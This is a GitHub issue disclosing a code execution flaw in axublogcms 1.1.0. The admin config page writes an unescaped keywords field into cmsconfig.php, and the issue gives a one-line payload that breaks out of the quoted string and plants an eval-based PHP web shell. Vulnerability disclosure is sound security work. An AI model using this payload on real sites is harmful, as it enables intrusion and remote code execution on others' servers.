Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

axublogcms1.1.0 the latest version Getshell #1

Open
Oran9e opened this issue May 4, 2018 · 0 comments
Open

axublogcms1.1.0 the latest version Getshell #1

Oran9e opened this issue May 4, 2018 · 0 comments

Comments

@Oran9e
Copy link

Oran9e commented May 4, 2018

axublogcms1.1.0 the latest version Getshell
Code Execution Vulnerability, Backstage write configuration file.
you can download the lastest version from it (pic.axublog.com/axublog1.1.0install.rar)
./ad/setconfig.php
1
Directly replace the submitted parameter $webkeywords without any escaping behavior.
So, here we can write a sentence. Seen in the 97 row, the../cmsconfig.php file is included directly, so the written word is written directly into the cmsconfig.php file.
Insert a sentence at the key word. Here we need to close the front webkeywords and close the double quotation marks, otherwise the incomplete PHP files will not run.
For example, 123456 "; @eval ($_POST['a']); $a="
2
3
4
5

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant